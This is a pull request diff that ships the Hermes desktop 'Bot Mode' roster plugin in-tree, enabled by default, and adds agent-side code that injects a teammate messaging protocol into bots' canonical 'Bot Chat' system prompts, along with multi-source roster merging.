### PR TITLE
feat(desktop): bundle Bot Mode as built-in default-on plugin + core teammate protocol

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -91,6 +91,10 @@ apps/desktop/dist/
 apps/desktop/src/**/*.js
 apps/desktop/src/**/*.js.map
 apps/desktop/src/**/*.d.ts
+# EXCEPT bundled plain-ESM plugin entries (adopted SDK-consumer plugins,
+# e.g. hermes-bots): plugin.js IS the source, not tsc output. No .tsx
+# sibling exists, so the stale-shadow hazard above cannot apply.
+!apps/desktop/src/plugins/*/plugin.js
 !apps/desktop/src/global.d.ts
 !apps/desktop/src/vite-env.d.ts
 apps/shared/src/**/*.js

--- a/agent/agent_init.py
+++ b/agent/agent_init.py
@@ -1906,6 +1906,10 @@ def init_agent(
         except Exception:
             pass
 
+    # Bot Mode teammate protocol section (tools/bot_mode_probe.py) — pure
+    # filesystem reads, no warm needed. Silent on non-Bot-Mode installs.
+    agent._bot_mode_protocol = bool(_agent_section.get("bot_mode_protocol", True))
+
     # Per-platform prompt-hint overrides (config.yaml → platform_hints).
     # Lets an enterprise admin append to or replace Hermes' built-in
     # platform hint for a single messaging platform (e.g. WhatsApp) without

--- a/agent/agent_init.py
+++ b/agent/agent_init.py
@@ -1909,6 +1909,10 @@ def init_agent(
     # Bot Mode teammate protocol section (tools/bot_mode_probe.py) — pure
     # filesystem reads, no warm needed. Silent on non-Bot-Mode installs.
     agent._bot_mode_protocol = bool(_agent_section.get("bot_mode_protocol", True))
+    # Session-title hint for the "Bot Chat" gate: hosts that defer the DB
+    # title write past the first prompt build (tui_gateway pending_title)
+    # set this so the gate doesn't depend on write ordering.
+    agent._session_title_hint = None
 
     # Per-platform prompt-hint overrides (config.yaml → platform_hints).
     # Lets an enterprise admin append to or replace Hermes' built-in

--- a/agent/conversation_loop.py
+++ b/agent/conversation_loop.py
@@ -790,7 +790,11 @@ def _restore_or_build_system_prompt(agent, system_message, conversation_history)
         # fails closed to "reuse" so a probe failure can't burn cache.
         _bot_stale = False
         try:
-            from tools.bot_mode_probe import stored_prompt_capability_stale
+            from tools.bot_mode_probe import (
+                BOT_CHAT_TITLE,
+                stored_bot_chat_prompt_needs_upgrade,
+                stored_prompt_capability_stale,
+            )
 
             _home_for_epoch = None
             try:
@@ -800,6 +804,21 @@ def _restore_or_build_system_prompt(agent, system_message, conversation_history)
             except Exception:
                 pass
             _bot_stale = stored_prompt_capability_stale(stored_prompt, _home_for_epoch)
+            if not _bot_stale and getattr(agent, "_bot_mode_protocol", True):
+                # Legacy upgrade: a Bot Chat whose prompt predates the epoch
+                # mechanism (no stamp, no protocol) gets ONE migration
+                # rebuild — otherwise pre-existing bots would never learn
+                # the messaging protocol. Title-gated so ordinary unstamped
+                # sessions (i.e. all of them) never take this path; the
+                # rebuilt prompt carries the stamp, so it cannot re-fire.
+                _t = str(getattr(agent, "_session_title_hint", "") or "").strip()
+                if not _t and agent._session_db and agent.session_id:
+                    try:
+                        _t = str(agent._session_db.get_session_title(agent.session_id) or "").strip()
+                    except Exception:
+                        _t = ""
+                if _t == BOT_CHAT_TITLE:
+                    _bot_stale = stored_bot_chat_prompt_needs_upgrade(stored_prompt, _home_for_epoch)
         except Exception:
             _bot_stale = False
         if _bot_stale:

--- a/agent/conversation_loop.py
+++ b/agent/conversation_loop.py
@@ -780,6 +780,65 @@ def _restore_or_build_system_prompt(agent, system_message, conversation_history)
             )
 
     if stored_prompt and _stored_prompt_matches_runtime(agent, stored_prompt):
+        # Bot Chat capability epoch: an eternal bot session must adopt
+        # user-initiated capability changes (skills/toolsets/MCP/SOUL/roster)
+        # on the next message, not at /new or compression. The stored prompt
+        # embeds a fingerprint of the capability surface; a mismatch against
+        # disk is a deliberate, once-per-change rebuild — the /model
+        # exception applied to capabilities. Prompts without the stamp
+        # (every non-Bot-Chat session) never take this branch, and the check
+        # fails closed to "reuse" so a probe failure can't burn cache.
+        _bot_stale = False
+        try:
+            from tools.bot_mode_probe import stored_prompt_capability_stale
+
+            _home_for_epoch = None
+            try:
+                from agent.system_prompt import _agent_home
+
+                _home_for_epoch = _agent_home(agent)
+            except Exception:
+                pass
+            _bot_stale = stored_prompt_capability_stale(stored_prompt, _home_for_epoch)
+        except Exception:
+            _bot_stale = False
+        if _bot_stale:
+            logger.info(
+                "Bot Chat capability epoch changed for session %s; rebuilding "
+                "system prompt to adopt the new capability surface (one-time "
+                "prefix-cache break).",
+                agent.session_id,
+            )
+            agent._session_title_hint = "Bot Chat"
+            # The skills index inside the prompt comes from a two-layer cache
+            # (in-process LRU + disk snapshot) that doesn't watch the skills
+            # dir; a capability refresh must rebuild THROUGH it or a freshly
+            # installed skill stays invisible in the new prompt.
+            try:
+                from agent.prompt_builder import clear_skills_system_prompt_cache
+
+                clear_skills_system_prompt_cache(clear_snapshot=True)
+            except Exception:
+                pass
+            agent._cached_system_prompt = agent._build_system_prompt(system_message)
+            agent._bot_capability_refreshed = True
+            # Persist the refreshed prompt so the NEXT turn restores the new
+            # bytes verbatim — the cache break is once per capability change,
+            # never per turn. (on_session_start deliberately not re-fired:
+            # this is a continuation, not a new session.)
+            if agent._session_db:
+                try:
+                    agent._session_db.update_system_prompt(
+                        agent.session_id, agent._cached_system_prompt
+                    )
+                except Exception as exc:
+                    logger.warning(
+                        "Session DB update_system_prompt failed after Bot Chat "
+                        "capability refresh (session=%s): %s. The refresh will "
+                        "re-fire next turn.",
+                        agent.session_id, exc,
+                    )
+            return
         # Continuing session — reuse the exact system prompt from the
         # previous turn so the Anthropic cache prefix matches.
         agent._cached_system_prompt = stored_prompt

--- a/agent/system_prompt.py
+++ b/agent/system_prompt.py
@@ -595,10 +595,12 @@ def build_system_prompt_parts(agent: Any, system_message: Optional[str] = None) 
     if getattr(agent, "_bot_mode_protocol", True):
         try:
             from tools.bot_mode_probe import BOT_CHAT_TITLE, get_bot_mode_protocol_section
-            _sdb = getattr(agent, "_session_db", None)
-            _sid = getattr(agent, "session_id", None)
-            _title = _sdb.get_session_title(_sid) if (_sdb and _sid) else None
-            if (_title or "").strip() == BOT_CHAT_TITLE:
+            _title = str(getattr(agent, "_session_title_hint", "") or "").strip()
+            if not _title:
+                _sdb = getattr(agent, "_session_db", None)
+                _sid = getattr(agent, "session_id", None)
+                _title = str((_sdb.get_session_title(_sid) if (_sdb and _sid) else None) or "").strip()
+            if _title == BOT_CHAT_TITLE:
                 _bot_section = get_bot_mode_protocol_section(_agent_home(agent))
                 if _bot_section:
                     post_workspace_parts.append(_bot_section)

--- a/agent/system_prompt.py
+++ b/agent/system_prompt.py
@@ -584,6 +584,23 @@ def build_system_prompt_parts(agent: Any, system_message: Optional[str] = None) 
             # Probe failure must never block prompt build.
             pass
 
+    # Bot Mode teammate protocol — when the desktop's Bot Mode manages this
+    # install (any profile carries ui_meta['hermes-bots']), every session of
+    # every profile learns the bot-to-bot messaging protocol, including
+    # headless `hermes -p <bot> chat` sessions started by a teammate. Silent
+    # on non-Bot-Mode installs and when the profile's SOUL.md already carries
+    # the section (legacy plugin-side append). Deterministic per (process,
+    # home) — cache-safe. Gated by config.yaml ``agent.bot_mode_protocol``
+    # (default True).
+    if getattr(agent, "_bot_mode_protocol", True):
+        try:
+            from tools.bot_mode_probe import get_bot_mode_protocol_section
+            _bot_section = get_bot_mode_protocol_section(_agent_home(agent))
+            if _bot_section:
+                post_workspace_parts.append(_bot_section)
+        except Exception:
+            pass
+
     # Active-profile hint — names the Hermes profile the agent is running
     # under so it doesn't conflate ~/.hermes/skills/ (default profile) with
     # ~/.hermes/profiles/<active>/skills/ (this profile's). Deterministic

--- a/agent/system_prompt.py
+++ b/agent/system_prompt.py
@@ -584,20 +584,24 @@ def build_system_prompt_parts(agent: Any, system_message: Optional[str] = None) 
             # Probe failure must never block prompt build.
             pass
 
-    # Bot Mode teammate protocol — when the desktop's Bot Mode manages this
-    # install (any profile carries ui_meta['hermes-bots']), every session of
-    # every profile learns the bot-to-bot messaging protocol, including
-    # headless `hermes -p <bot> chat` sessions started by a teammate. Silent
-    # on non-Bot-Mode installs and when the profile's SOUL.md already carries
-    # the section (legacy plugin-side append). Deterministic per (process,
-    # home) — cache-safe. Gated by config.yaml ``agent.bot_mode_protocol``
-    # (default True).
+    # Bot Mode teammate protocol — injected ONLY into a bot's canonical
+    # "Bot Chat" session (the conversation teammate bots message into via
+    # `hermes -p <bot> chat --in ~ -c "Bot Chat"` and the desktop pins), on
+    # installs where Bot Mode manages profiles (ui_meta['hermes-bots']).
+    # Regular sessions never carry it — the desktop's composer middleware
+    # owns the @mention send path. Title is read once at first build and the
+    # rendered prompt is cached + DB-restored, so this is cache-safe.
+    # Gated by config.yaml ``agent.bot_mode_protocol`` (default True).
     if getattr(agent, "_bot_mode_protocol", True):
         try:
-            from tools.bot_mode_probe import get_bot_mode_protocol_section
-            _bot_section = get_bot_mode_protocol_section(_agent_home(agent))
-            if _bot_section:
-                post_workspace_parts.append(_bot_section)
+            from tools.bot_mode_probe import BOT_CHAT_TITLE, get_bot_mode_protocol_section
+            _sdb = getattr(agent, "_session_db", None)
+            _sid = getattr(agent, "session_id", None)
+            _title = _sdb.get_session_title(_sid) if (_sdb and _sid) else None
+            if (_title or "").strip() == BOT_CHAT_TITLE:
+                _bot_section = get_bot_mode_protocol_section(_agent_home(agent))
+                if _bot_section:
+                    post_workspace_parts.append(_bot_section)
         except Exception:
             pass
 

--- a/agent/system_prompt.py
+++ b/agent/system_prompt.py
@@ -594,7 +594,11 @@ def build_system_prompt_parts(agent: Any, system_message: Optional[str] = None) 
     # Gated by config.yaml ``agent.bot_mode_protocol`` (default True).
     if getattr(agent, "_bot_mode_protocol", True):
         try:
-            from tools.bot_mode_probe import BOT_CHAT_TITLE, get_bot_mode_protocol_section
+            from tools.bot_mode_probe import (
+                BOT_CHAT_TITLE,
+                epoch_line,
+                get_bot_mode_protocol_section,
+            )
             _title = str(getattr(agent, "_session_title_hint", "") or "").strip()
             if not _title:
                 _sdb = getattr(agent, "_session_db", None)
@@ -604,6 +608,16 @@ def build_system_prompt_parts(agent: Any, system_message: Optional[str] = None) 
                 _bot_section = get_bot_mode_protocol_section(_agent_home(agent))
                 if _bot_section:
                     post_workspace_parts.append(_bot_section)
+                    # Eternal-session support: stamp the capability epoch so
+                    # the restore path can detect user-initiated capability
+                    # changes (skills/toolsets/MCP/SOUL/roster) and rebuild
+                    # ONCE per change instead of waiting for /new or
+                    # compression. Also marks this prompt as timeless — the
+                    # volatile timestamp line is omitted (see below), since a
+                    # birth date pinned in a session that lives for months is
+                    # misinformation.
+                    post_workspace_parts.append(epoch_line(_agent_home(agent)))
+                    agent._bot_chat_timeless_prompt = True
         except Exception:
             pass
 
@@ -825,6 +839,12 @@ def build_system_prompt_parts(agent: Any, system_message: Optional[str] = None) 
     timestamp_line = (
         f"Conversation started: {now.strftime('%A, %B %d, %Y')}{_zone_suffix}"
     )
+    # Bot Chat sessions are effectively eternal — a birth date frozen in the
+    # prompt becomes confidently-wrong misinformation within days. Timeless
+    # prompts keep the identity lines but drop the date (the timezone still
+    # rides workspace context; live time comes from the terminal tool).
+    if getattr(agent, "_bot_chat_timeless_prompt", False):
+        timestamp_line = f"Timezone: {', '.join(_zone_bits)}" if _zone_bits else ""
     if agent.pass_session_id and agent.session_id:
         timestamp_line += f"\nSession ID: {agent.session_id}"
     if agent.model:

--- a/apps/desktop/package.json
+++ b/apps/desktop/package.json
@@ -67,6 +67,7 @@
     "test": "vitest run",
     "preview": "node scripts/assert-root-install.mjs && vite preview --host 127.0.0.1 --port 4174",
     "check:test:desktop:platforms": "npm run test:desktop:platforms",
+    "check:test:plugins": "node --test src/plugins/*/tests/*.test.mjs",
     "check:test:ui:shard-1of3": "node scripts/run-ui-shard.mjs",
     "check:test:ui:shard-2of3": "node scripts/run-ui-shard.mjs",
     "check:test:ui:shard-3of3": "node scripts/run-ui-shard.mjs",

--- a/apps/desktop/src/contrib/plugins.ts
+++ b/apps/desktop/src/contrib/plugins.ts
@@ -1,10 +1,13 @@
 /**
  * Plugin discovery — both delivery modes:
  *
- *  - BUNDLED: every `src/plugins/<name>/plugin.{ts,tsx}` default-exporting a
- *    `HermesPlugin` registers automatically (vite glob — drop a folder in).
- *    None ship in-tree today; reference/demo plugins live in the companion
- *    `hermes-example-plugins` repo.
+ *  - BUNDLED: every `src/plugins/<name>/plugin.{js,ts,tsx}` default-exporting
+ *    a `HermesPlugin` registers automatically (vite glob — drop a folder in).
+ *    `hermes-bots` (Bot Mode) ships in-tree and is ON by default; other
+ *    reference/demo plugins live in the companion `hermes-example-plugins`
+ *    repo. `.js` entries are SDK-consumer plugins adopted from standalone
+ *    repos — they keep the plain-ESM plugin.js form so the file stays
+ *    loadable by older desktops' runtime door too.
  *  - RUNTIME: the on-disk doors (`<hermes home>/desktop-plugins/<name>/plugin.js`
  *    and the unified-package half `<hermes home>/plugins/<name>/desktop/plugin.js`)
  *    — the agent's/user's doors, watched + hot-reloaded by the runtime loader.
@@ -14,7 +17,7 @@ import { createPluginContext, type HermesPlugin } from './plugin'
 import { pluginActive, publishPlugin } from './plugins-store'
 import { watchRuntimePlugins } from './runtime-loader'
 
-const modules = import.meta.glob<{ default: HermesPlugin }>('../plugins/*/plugin.{ts,tsx}', { eager: true })
+const modules = import.meta.glob<{ default: HermesPlugin }>('../plugins/*/plugin.{js,ts,tsx}', { eager: true })
 
 // One-shot init guard. Contributions themselves register by id (re-registering
 // is idempotent), but the disk-door watcher setup below (watchRuntimePlugins)

--- a/apps/desktop/src/contrib/runtime-loader.ts
+++ b/apps/desktop/src/contrib/runtime-loader.ts
@@ -32,7 +32,7 @@ import { installPluginSdk, sdkImportMap } from '@/sdk/runtime'
 import { notifyError } from '@/store/notifications'
 
 import { createPluginContext, type HermesPlugin } from './plugin'
-import { dropPlugin, pluginActive, type PluginKind, publishPlugin } from './plugins-store'
+import { $pluginRecords, dropPlugin, pluginActive, type PluginKind, publishPlugin } from './plugins-store'
 
 interface LoadOptions {
   /** Root-level default-enable CAP: `false` ships the plugin opt-in (inventory
@@ -140,6 +140,17 @@ export async function loadRuntimePlugin(
 
     if (!plugin?.id || typeof plugin.register !== 'function') {
       throw new Error(`${origin} has no valid default HermesPlugin export`)
+    }
+
+    // A disk/runtime copy of a plugin that now ships BUNDLED (e.g. a
+    // standalone install of hermes-bots predating its adoption in-tree) must
+    // not register a second time: contributions would double up and the two
+    // copies would fight over storage. The bundled copy wins; the disk copy
+    // is skipped quietly so stale installs keep working after an app update.
+    if ($pluginRecords.get()[plugin.id]?.kind === 'bundled') {
+      console.info(`[plugins] ${origin} skipped — "${plugin.id}" already ships bundled with the app`)
+
+      return null
     }
 
     const record = {

--- a/apps/desktop/src/plugins/hermes-bots/LICENSE
+++ b/apps/desktop/src/plugins/hermes-bots/LICENSE
@@ -1,0 +1,21 @@
+MIT License
+
+Copyright (c) 2026 Nous Research
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

--- a/apps/desktop/src/plugins/hermes-bots/plugin.js
+++ b/apps/desktop/src/plugins/hermes-bots/plugin.js
@@ -2015,12 +2015,29 @@ function useRoster() {
   return useQuery({
     queryKey: ROSTER_KEY,
     queryFn: async () => {
-      const res = await host.request('profiles.list', {})
+      // Rich rows (last_session, ui_meta, has_avatar) come from the ACTIVE
+      // gateway's profiles.list — unchanged single-source behavior.
+      const local = await host.request('profiles.list', {})
       // Newer backends inject the teammate-messaging protocol into every
       // session's system prompt (agent.bot_mode_protocol) — SOUL.md must not
       // carry a second copy. Older gateways lack the flag: keep appending.
-      serverInjectsProtocol = Boolean(res?.bot_mode_protocol)
-      return res
+      serverInjectsProtocol = Boolean(local?.bot_mode_protocol)
+
+      // Multi-source desktops (hermes-agent #86875) also expose the union
+      // agent roster across every registered connection. Merge agents from
+      // OTHER sources in as additional rows. Feature-detected + best-effort:
+      // an older Desktop build (no host.agents) or a roster hiccup leaves
+      // the local list exactly as it was.
+      if (typeof host.agents === 'function') {
+        try {
+          const union = await host.agents()
+          return mergeMultiSourceRoster(local, union)
+        } catch {
+          /* older build or roster failure — single-source list stands */
+        }
+      }
+
+      return local
     },
     refetchInterval: 5000,
     staleTime: 5000,
@@ -2031,16 +2048,69 @@ function useRoster() {
   })
 }
 
-/** The @handle users tag a bot with. The primary profile's callable alias
- *  is 'hermes' — the mention middleware resolves it back to 'default' — so
- *  the word 'default' never surfaces in the UI. */
-function botHandle(name) {
+/** Merge the union agent roster (host.agents) over the active gateway's
+ *  profiles.list. Local-source rows are matched by profile name and only
+ *  ANNOTATED (handle, connectionId) — their rich fields stay authoritative.
+ *  Rows from other sources become new roster entries tagged with their
+ *  source label so BotRow can badge them and route open/warm through
+ *  ensureAgent/warmAgent. Pure — exercised directly by the tests. */
+function mergeMultiSourceRoster(local, union) {
+  const profiles = Array.isArray(local?.profiles) ? local.profiles.slice() : []
+  const agents = Array.isArray(union?.agents) ? union.agents : []
+
+  if (!agents.length) {
+    return { ...local, profiles }
+  }
+
+  const localByName = new Map(profiles.map(p => [p.name, p]))
+
+  for (const agent of agents) {
+    const isLocalSource = agent.connectionKind === 'local'
+    const row = isLocalSource ? localByName.get(agent.profile) : null
+
+    if (row) {
+      // Annotate in place: the @name-device handle only differs from the
+      // bare name when the profile exists on several sources.
+      row.handle = agent.handle
+      row.connectionId = agent.connectionId
+      continue
+    }
+
+    if (isLocalSource) {
+      // Union saw a local profile profiles.list didn't return (older
+      // backend mid-refresh) — skip rather than invent a thin row.
+      continue
+    }
+
+    profiles.push({
+      name: agent.profile,
+      handle: agent.handle,
+      connectionId: agent.connectionId,
+      connectionKind: agent.connectionKind,
+      connectionLabel: agent.connectionLabel,
+      remoteSource: true
+    })
+  }
+
+  return { ...local, profiles }
+}
+
+/** The @handle users tag a bot with. Multi-source rosters precompute the
+ *  handle (bare name, or name-device when the profile exists on several
+ *  registered sources) — prefer it when present. The primary profile's
+ *  callable alias is 'hermes' — the mention middleware resolves it back to
+ *  'default' — so the word 'default' never surfaces in the UI. */
+function botHandle(name, bot) {
+  if (bot?.handle && bot.handle !== name) {
+    return bot.handle
+  }
+
   return (name || '').trim().toLowerCase() === 'default' ? 'hermes' : name
 }
 
-function showsHandle(name, meta) {
+function showsHandle(name, meta, bot) {
   const display = displayName({ name }, meta)
-  return Boolean(name && display.toLowerCase() !== botHandle(name).toLowerCase())
+  return Boolean(name && display.toLowerCase() !== botHandle(name, bot).toLowerCase())
 }
 
 // ── canonical bot chat ───────────────────────────────────────────────────────
@@ -2192,8 +2262,13 @@ function filterBots(roster, metaByName, query) {
   return roster.filter(bot => {
     const display = displayName(bot, metaByName[bot.name]).toLowerCase()
     const profile = (bot.name || '').toLowerCase()
-    const handle = botHandle(bot.name).toLowerCase()
-    return display.includes(needle) || profile.includes(needle) || handle.includes(needle)
+    const handle = botHandle(bot.name, bot).toLowerCase()
+    // Multi-source rows also match on their device name ("homelab" finds
+    // every bot living on the Homelab connection).
+    const sourceLabel = (bot.connectionLabel || '').toLowerCase()
+    return (
+      display.includes(needle) || profile.includes(needle) || handle.includes(needle) || sourceLabel.includes(needle)
+    )
   })
 }
 
@@ -2956,6 +3031,17 @@ function BotRow({ bot, onDelete, onEdit, onGroup }) {
     : last?.preview || bot.description || 'No conversations yet — say hi'
 
   const warm = () => {
+    // Multi-source row: pre-dial the agent's OWN source (feature-detected).
+    if (bot.remoteSource && typeof host.warmAgent === 'function') {
+      try {
+        host.warmAgent(bot.connectionId, bot.name)
+      } catch {
+        /* warm is best-effort */
+      }
+
+      return
+    }
+
     if (typeof host.warmProfile !== 'function') {
       return
     }
@@ -2975,6 +3061,29 @@ function BotRow({ bot, onDelete, onEdit, onGroup }) {
       const next = { ...$botUnread.get() }
       delete next[bot.name]
       $botUnread.set(next)
+    }
+
+    // Multi-source row: activate the agent's source gateway FIRST so the
+    // canonical-chat RPCs (session.list / session.create / openSession)
+    // land on the backend that actually owns this bot's state.db. Same
+    // canonical-chat flow after that — one forever chat per bot, per source.
+    if (bot.remoteSource) {
+      if (typeof host.ensureAgent !== 'function') {
+        host.notifyError?.(
+          new Error('Update Hermes Desktop to chat with agents on other connections.'),
+          bot.connectionLabel || 'Remote source'
+        )
+
+        return
+      }
+
+      try {
+        await host.ensureAgent(bot.connectionId, bot.name)
+      } catch (error) {
+        host.notifyError?.(error, `Could not reach ${bot.connectionLabel || 'the remote source'}`)
+
+        return
+      }
     }
 
     try {
@@ -3029,10 +3138,18 @@ function BotRow({ bot, onDelete, onEdit, onGroup }) {
                     className: 'truncate text-[0.8125rem] font-medium',
                     children: displayName(bot, meta)
                   }),
-                  showsHandle(bot.name, meta)
+                  showsHandle(bot.name, meta, bot)
                     ? jsx('span', {
                         className: 'shrink-0 font-mono text-[0.6875rem] text-(--ui-text-quaternary)',
-                        children: `@${botHandle(bot.name)}`
+                        children: `@${botHandle(bot.name, bot)}`
+                      })
+                    : null,
+                  bot.remoteSource
+                    ? jsx('span', {
+                        className:
+                          'shrink-0 rounded bg-(--chrome-action-hover) px-1 font-mono text-[0.625rem] text-(--ui-text-tertiary)',
+                        title: `Lives on ${bot.connectionLabel}`,
+                        children: bot.connectionLabel
                       })
                     : null
                 ]

--- a/apps/desktop/src/plugins/hermes-bots/plugin.js
+++ b/apps/desktop/src/plugins/hermes-bots/plugin.js
@@ -2838,7 +2838,8 @@ function backfillMessagingProtocol(roster) {
 }
 
 /** SOUL.md for a new bot: identity (or the user's custom SOUL) + the
- *  messaging protocol, which ALWAYS ships. */
+ *  messaging protocol — which ships UNLESS the backend injects it into the
+ *  system prompt itself (bot_mode_protocol capability). */
 function composeSoul({ name, title, description, roster, customSoul }) {
   if (customSoul && customSoul.trim()) {
     return ensureMessagingProtocol(customSoul, name, roster)
@@ -2854,7 +2855,9 @@ function composeSoul({ name, title, description, roster, customSoul }) {
     'You keep your own memory, skills, and conversation history across sessions.'
   ]
 
-  return lines.filter(line => line !== null).join('\n') + '\n\n' + messagingProtocolSection(name, roster)
+  const identity = lines.filter(line => line !== null).join('\n')
+
+  return serverInjectsProtocol ? identity : identity + '\n\n' + messagingProtocolSection(name, roster)
 }
 
 // ── human-readable row helpers ───────────────────────────────────────────────

--- a/apps/desktop/src/plugins/hermes-bots/plugin.js
+++ b/apps/desktop/src/plugins/hermes-bots/plugin.js
@@ -1,0 +1,6538 @@
+/**
+ * Hermes Bot Mode — a "one chat per agent" roster for the Hermes desktop.
+ *
+ * Left pane "Bots": one row per Hermes profile (a bot = an agent profile) with
+ * a customizable avatar (shape + color + eyes, image, or pet). Click opens that
+ * bot's chat; right-click → Edit Profile (avatar, title, description).
+ * "New Agent" creates a profile — Name / Title / Description with an
+ * "Advanced" disclosure for full profile config.
+ *
+ * Right tile "Routines": scheduled tasks (Hermes cron jobs) scoped to the
+ * bot you're currently chatting with — follows the live gateway profile.
+ *
+ * Bots message each other straight into each bot's ONE canonical "Bot
+ * Chat" — @-mentions deliver over gateway RPCs (no CLI relay), and
+ * bot-initiated sends use `hermes -p <bot> chat --in ~ -c "Bot Chat"`.
+ */
+
+import * as sdk from '@hermes/plugin-sdk'
+import {
+  atom,
+  Button,
+  Checkbox,
+  cn,
+  Codicon,
+  COMPOSER_AREAS,
+  ContextMenu,
+  ContextMenuContent,
+  ContextMenuItem,
+  ContextMenuSeparator,
+  ContextMenuTrigger,
+  ConfirmDialog,
+  Dialog,
+  DialogContent,
+  DialogDescription,
+  DialogFooter,
+  DialogHeader,
+  DialogTitle,
+  EmptyState,
+  GlyphSpinner,
+  haptic,
+  host,
+  Input,
+  PALETTE_AREA,
+  profileColor,
+  queryClient,
+  relativeTime,
+  ScrollArea,
+  SearchField,
+  Select,
+  SelectContent,
+  SelectItem,
+  SelectTrigger,
+  SelectValue,
+  Switch,
+  Textarea,
+  Tip,
+  useQuery,
+  useValue
+} from '@hermes/plugin-sdk'
+import { useEffect, useRef, useState } from 'react'
+import { jsx, jsxs } from 'react/jsx-runtime'
+
+const { McpTab, ToolsetConfigPanel } = sdk
+// Keep optional exports feature-detected; test harnesses may strip the SDK namespace.
+const SkillsView = typeof sdk === 'undefined' ? undefined : sdk.SkillsView
+
+const ID = 'hermes-bots'
+const ROSTER_KEY = [ID, 'roster']
+const ROUTINES_KEY = [ID, 'routines']
+const NAME_RE = /^[a-z0-9][a-z0-9_-]{0,63}$/
+
+/** Captured in register() so components can reach plugin storage. */
+let pluginCtx = null
+
+/** Live roster snapshot for imperative handlers (context menus). */
+const $lastRoster = atom([])
+
+/** Bots with chat activity the user hasn't seen yet (name -> true).
+ *  Fed by the roster poll's activity watermark, so it catches EVERY
+ *  delivery path: RPC, CLI (bot-to-bot), cron runs, other machines. */
+const $botUnread = atom({})
+
+// last_active watermark per bot, seeded on first poll so a fresh mount
+// doesn't mark ancient history unread.
+const rosterWatermarks = new Map()
+let watermarksSeeded = false
+
+/** User pref: toast on every new bot activity. Default OFF — a busy roster
+ *  (cron runs, bot-to-bot chatter) turns the toasts into a firehose, and the
+ *  unread badge already carries the signal. Persisted via ctx.storage. */
+const $activityToasts = atom(false)
+
+/** Flip the activity-toast pref and persist it. */
+function setActivityToasts(enabled) {
+  $activityToasts.set(enabled)
+
+  try {
+    Promise.resolve(pluginCtx?.storage?.set?.('activity-toasts', enabled)).catch(() => undefined)
+  } catch {
+    /* storage unavailable — pref holds for this window only */
+  }
+}
+
+/** Detect new inbound activity from a fresh roster: last_active moved past
+ *  the watermark for a bot whose chat isn't on screen -> unread + toast. */
+function trackInboundActivity(roster) {
+  const seeding = !watermarksSeeded
+  watermarksSeeded = true
+
+  for (const bot of roster) {
+    const ts = bot.last_session?.last_active || 0
+    const prev = rosterWatermarks.get(bot.name) || 0
+    rosterWatermarks.set(bot.name, Math.max(prev, ts))
+
+    if (seeding || ts <= prev) {
+      continue
+    }
+
+    // Activity in the bot the user is currently looking at is already
+    // visible — never badge the open chat.
+    if ($selectedBot.get() === bot.name) {
+      continue
+    }
+
+    $botUnread.set({ ...$botUnread.get(), [bot.name]: true })
+
+    // Toasts are opt-in: the unread badge is always set above, but the
+    // per-message notification fires only when the user enabled it.
+    if ($activityToasts.get()) {
+      const meta = $botMeta.get()[bot.name]
+      const label = displayName(bot, meta)
+      const preview = (bot.last_session?.preview || '').trim()
+      const inbound = /^Message from/i.test(preview)
+
+      host.notify({
+        kind: 'info',
+        title: inbound ? `\uD83E\uDD16 New message for ${label}` : `${label} has new activity`,
+        message: preview.slice(0, 140) || 'Open the chat to see it.'
+      })
+    }
+  }
+}
+
+/** Last good cron list, same idea as the roster snapshot. */
+const $lastJobs = atom([])
+
+/** User pref: hide canonical "Bot Chat" sessions from the global Sessions
+ *  sidebar (they always remain in the Bots roster). Persisted via ctx.storage.
+ *  Default ON — Bot Chats are plugin-owned forever-chats, not scratch sessions,
+ *  so keeping them out of the shared recents list is the expected behavior.
+ *  Backed by the core generic `hidden` session flag (session.create hidden:true
+ *  / session.set_hidden); older gateways ignore it and Bot Chats stay visible. */
+const $hideBotChats = atom(true)
+
+/** Bot the Routines tile is scoped to. Follows the live gateway profile
+ *  (the bot you're actually chatting with) and roster clicks. */
+const $selectedBot = atom('default')
+
+/** Optional secondary navigation inside the Bots pane. Primary row clicks still
+ * open the bot's canonical chat; this state opens its stored-session browser. */
+const $botSessionsWorkspace = atom(null)
+const $botSelectedSessions = atom({})
+const $sessionsGatewayGeneration = atom(0)
+
+/** Group-chat rooms: { [group]: { log: [{from:{kind,name},text,at}], watermarks:{[member]:idx}, epoch, running } }.
+ *  Log + watermarks persist via plugin storage; epoch/running are runtime-only. */
+const $groupChats = atom({})
+/** Group whose room view is open in the Bots pane (secondary navigation,
+ *  same pattern as $botSessionsWorkspace). */
+const $groupChatWorkspace = atom(null)
+/** Groups whose latest room activity mentions @user — the needs-you badge. */
+const $groupNeedsYou = atom({})
+
+function handleSessionsGatewayTransition() {
+  $sessionsGatewayGeneration.set($sessionsGatewayGeneration.get() + 1)
+  $botSelectedSessions.set({})
+  // A gateway swap invalidates any in-flight room drive: bump every room's
+  // epoch so running loops bail at their next member boundary.
+  const rooms = { ...$groupChats.get() }
+
+  for (const name of Object.keys(rooms)) {
+    rooms[name] = { ...rooms[name], epoch: (rooms[name].epoch || 0) + 1, running: false }
+  }
+
+  $groupChats.set(rooms)
+}
+
+/** Per-bot appearance + display meta, persisted via ctx.storage:
+ *  { [botName]: { shape, color, title } } */
+const $botMeta = atom({})
+
+async function saveBotMeta(name, patch) {
+  const prevMeta = $botMeta.get()[name] || {}
+  const next = { ...$botMeta.get(), [name]: { ...prevMeta, ...patch } }
+  $botMeta.set(next)
+
+  // Local plugin storage: instant, and the fallback for older gateways.
+  try {
+    Promise.resolve(pluginCtx?.storage?.set?.('bot-meta', next)).catch(() => undefined)
+  } catch {
+    /* storage unavailable — look persists for this window only */
+  }
+
